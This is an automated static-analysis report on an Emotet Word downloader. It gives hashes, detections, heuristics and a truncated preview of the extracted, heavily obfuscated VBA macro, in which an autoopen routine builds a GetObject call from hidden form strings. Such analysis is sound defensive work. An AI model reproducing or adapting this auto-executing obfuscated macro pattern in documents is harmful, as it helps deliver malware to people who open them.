Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 d4c7d27e051b8d5a…

MALICIOUS

Office (OLE)

Size: 223.4 KB
Created: 2019-04-02 15:24:00
Authoring application: Microsoft Office Word
First seen: 2019-12-09
MD5: 5c8b6874ff27a4ae9494d177941ef32b
SHA-1: 8d84614813e158dc23c8af02bb633cbbc1276540
SHA-256: d4c7d27e051b8d5a5b012db73d7392ff5605cdb65a7a05b1bd4513896750fffe
Risk Score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The file was detected as malicious by ClamAV with the signature Doc.Downloader.Emotet-6922306-0, indicating a high likelihood that it is an Emotet variant. Heuristics confirm the presence of an auto-executing VBA macro (autoopen) that uses GetObject, a common technique for downloading and executing payloads. The VBA code is heavily obfuscated (padded with arithmetic inside conditions that can never be true), but the overall behavior points to a downloader.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6922306-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6922306-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    Document contains an AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    Macro code contains a GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 33944 bytes
SHA-256: 84e0482e003ba4119fc28bf3f9c0b956118c7bf4f4cb6ea3795f5e44908d0340

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "uxXUwA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "CCCAUG"
Attribute VB_Base = "0{DA225CCD-A1D1-4054-962C-178FCEEDE2C2}{2C96C4D1-C9D7-4AED-9ECA-55CEE29041AD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wAQ4AAG"
Attribute VB_Base = "0{9A831BDD-A1F4-4769-B993-181AD6FE82B8}{98579F07-5F6E-4BA5-A5D1-6E9615CD6674}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "DCAQAoQA"
Function cZoAB4()
   If 922521435 = 192851129 Then
qU1UAGoc = RUAocw + Int(546108065 * Asc(hAcABA) + FAABAUQB _
/ 750093452) + XAAwAADA / CLng(UUZAkD) - (SUADGQAk - A11AAB / 121293747 - Tan _
(FBowAxc) + (rZw4cAU / CSng(Ec_A11) + _
370614578 / Sgn(631284066) * (HAGwGU_A + CVar(465584512))))
End If
   If 435054564 = 818161751 Then
kkDw_AA = zAXZAAcA + Int(545493911 * Asc(NX1kAD) + EAUABBA _
/ 877746438) + nAkDxCB / CLng(JUBUoA) - (bBAAUA - BQADGAUA / 906233597 - Tan _
(wAAAA1) + (rwAZ_ZQU / CSng(WUQ4Zc) + _
397302150 / Sgn(444886369) * (nAkZkDD + CVar(379243473))))
End If
End Function
Function fBcGAQ()
   If 250512773 = 195680977 Then
SoABDoD = RBAGko + Int(186865208 * Asc(DZZADcBD) + YDUDAAD _
/ 459123665) + lkA_AAGw / CLng(acwAkAAA) - (kAAUAw - nDxAGGD / 943216695 - Tan _
(TC1AAA) + (sCwUAAG / CSng(XwXBAX) + _
190933911 / Sgn(449865101) * (DAQDXAAQ + CVar(830954521))))
End If
   If 220171445 = 266073721 Then
m1DBBoAA = vCCAAAcw + Int(227740423 * Asc(aXB_XAXA) + RAZ1BA4A _
/ 6062163) + mCAUAA / CLng(RcAAXAkZ) - (j4QCA4A - JcUXw_G / 768255806 - Tan _
(DAcZAAo1) + (CABQUU / CSng(oAAZ4QQ) + _
848943287 / Sgn(939377856) * (NZ_AGxZA + CVar(125401684))))
End If
   If 958117308 = 378079 Then
jBxABxB1 = SBQAG1Dw + Int(880373189 * Asc(sU4ADXAG) + lkAUkA4 _
/ 407828553) + vXUBBAAC / CLng(mkoCQXU) - (qB4UAA - RQZZAA / 971871709 - Tan _
(kAw4AQAU) + (MGACAcw / CSng(P_QAk4) + _
934764276 / Sgn(422199939) * (zUAAD_ + CVar(344229574))))
End If
End Function
Sub autoopen()
DDAUok
End Sub
Function DDAUok()
On Error Resume Next
   If 355240245 = 100129994 Then
OUUXXAAk = fQAxoADA + Int(157204850 * Asc(iQDXkX) + vUDUooAk _
/ 961538834) + PA1AAAAU / CLng(tDCwZGA) - (DUcA4D - WkAAU_ / 176689080 - Tan _
(PD11B_) + (B1AXDw / CSng(zAAA4UDQ) + _
749369791 / Sgn(830719178) * (k_AQDDUD + CVar(63633416))))
End If
   If 74628408 = 382572562 Then
bxDAAA4 = NAXXAwAA + Int(582183367 * Asc(icAAG1k) + F1xAAcA _
/ 699891075) + rwDk1Qk1 / CLng(JCZAAAB4) - (zAQwAC - XBXwDAU / 309249239 - Tan _
(GQBxxk_A) + (UAA_UXoQ / CSng(SAwGAAQc) + _
881748134 / Sgn(752212322) * (VU_QZC + CVar(301013295))))
End If
   If 381837829 = 101449969 Then
UwDBwA = GAD_kBX + Int(795287431 * Asc(X1AoBAD) + RwZDwAUA _
/ 698726230) + kAGB4wA / CLng(aADDCAGU) - (XZBkBw4 - mUQ_ZXAx / 609090801 - Tan _
(TDCAA4) + (IBAU1A / CSng(G1BAcAUG) + _
128489058 / Sgn(758966201) * (KX4DAwA + CVar(89512383))))
End If
Set a4AZAAZ_ = GetObject(CCCAUG.iQAAAA + wAQ4AAG.aoBA4ZB + CCCAUG.iQAAAA)
   If 152501303 = 350756035 Then
iBAUkAA = zAAUUG + Int(718490214 * Asc(t4CB4AcG) + zAU11A _
/ 580512185) + XQABAAwU / CLng(iAwAU_xQ) - (NUAGAxAB - pAAxkc / 803980014 - Tan _
(GDGXGZ) + (WxA1DQA_ / CSng(VAQAGCQ) + _
194629198 / Sgn(789590622) * (kUGCUU + CVar(612864128))))
End If
   If 453891930 = 139417440 Then
v_U_cxG = H1oGBD + Int(370963631 * Asc(TBkoBACQ) + BDAAUAwo _
/ 663864062) + QcDUkAkB / CLng(WQZAAQx) - (ZAkGwGD_ - RZUAXAoQ / 169033843 - Tan _
(rUQZ4B) + (pUXAAA / CSng(PkxQcC) + _
91786516 / Sgn(24242461) * (F1GAAooB + CVar(662779619))))
End If
   If 362589372 
... (truncated)